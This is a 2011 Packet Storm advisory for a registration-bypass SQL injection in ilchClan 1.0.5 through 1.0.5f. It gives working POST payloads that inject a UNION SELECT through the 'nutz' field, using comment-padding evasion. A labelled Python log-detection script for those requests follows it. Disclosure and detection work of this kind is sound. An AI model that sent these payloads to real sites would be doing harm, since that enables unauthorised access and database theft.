ilchClan 1.0.5 SQL Injection

2011-04-02T00:00:00
ID PACKETSTORM:100011
Type packetstorm
Reporter Easy Laster
Modified 2011-04-02T00:00:00

Description

                                        
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
Security Flaw in ilch clan 1.0.5 a,b,c,d,e,f! in regist.php  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
SQL Injection Vulnerability in ilch clan 1.0.5 a,b,c,d,e,f!  
Vulnerability Name : Registration Bypass SQL Injection Vulnerability  
Date : 02.04.2011  
SQL Injection method : $_POST   
Discovered by : Easy Laster  
Security Group : Team-Internet, Undergroundagents, websec-empire.to and 4004-Security-Project.com  
Greetings to free-hack.com  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
Security Flaws  
=-=-=-=-=-=-=-=-=-=-=-=  
ilch clan 1.0.5  
checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa  
ilch clan 1.0.5a  
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa  
ilch clan 1.0.5b  
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaa  
ilch clan 1.0.5c  
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaa  
ilch clan 1.0.5d  
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaaa  
ilch clan 1.0.5e  
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa  
ilch clan 1.0.5f  
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa  
  
`
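
A log-side detection check for the request bodies listed above, as an added example that is not part of the original advisory: it decodes a form-encoded POST body, undoes the `/**/` comment padding and mixed-case keywords the payloads rely on, and only then matches on the `nutz` field. The rule names, function names and the two benign sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

WATCHED_FIELDS = ("nutz",)  # POST field named in the advisory

COMMENT = re.compile(r"/\*.*?\*/", re.S)  # inline /* ... */ padding
RULES = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "quote": re.compile(r"['\"]"),
    "trailing-comment": re.compile(r"(--|#)\s*$"),
}

def normalise(value: str) -> str:
    """Undo the evasions seen in the advisory: comment padding, mixed case."""
    value = COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()

def inspect_body(body: str) -> dict:
    """Map each watched field to the rule names its decoded value matches."""
    findings = {}
    fields = parse_qs(body, keep_blank_values=True)  # decodes '+' and %xx
    for name in WATCHED_FIELDS:
        for raw in fields.get(name, []):
            norm = normalise(raw)
            hits = [rule for rule, rx in RULES.items() if rx.search(norm)]
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings

def is_suspicious(body: str) -> bool:
    """Alert on UNION SELECT, or on two weaker signals together."""
    return any("union-select" in hits or len(hits) >= 2
               for hits in inspect_body(body).values())

# First body is the 1.0.5 request from the advisory; the others are constructed.
SAMPLES = [
    "checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa",
    "checked=Gelesen+und+einverstanden&nutz=easy_player&email=a%40example.org",
    "checked=Gelesen+und+einverstanden&nutz=O'Brien&email=b%40example.org",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(is_suspicious(body), inspect_body(body))
```

A lone quote, as in the constructed `O'Brien` body, is reported as a finding but does not raise an alert on its own, which keeps ordinary names from flooding the queue.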